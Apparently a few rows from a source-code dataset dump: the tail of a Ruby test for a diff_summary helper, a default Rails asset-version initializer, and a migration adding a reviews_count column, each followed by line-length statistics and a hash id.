{ type: diff[0],
old_filename: diff[1],
new_filename: diff[2],
line_counts: { added:diff[3], deleted:diff[4], same:diff[5] }
}
end
actual = diff_summary(id, was_index, now_index)
assert_equal expected, actual
end
def diff_summary(id, was_index, now_index)
differ.diff_summary(id:id, was_index:was_index, now_index:now_index)
end
end
| 33.092715 | 87 | 0.554333 |
01891696fb77a6cf8c03319ed7a65cc69e7e6a02 | 491 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = '1.0'
# Add additional assets to the asset load path
# Rails.application.config.assets.paths << Emoji.images_path
# Precompile additional assets.
# application.js, application.css.sass, and all non-JS/CSS in app/assets folder are already added.
# Rails.application.config.assets.precompile += %w( search.js )
| 40.916667 | 98 | 0.769857 |
5de6d226cb16193212fe41dcfdd68bdd7abe7116 | 131 | class AddReviewsCountToItems < ActiveRecord::Migration[5.2]
def change
add_column :items, :reviews_count, :integer
end
end
| 21.833333 | 59 | 0.763359 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.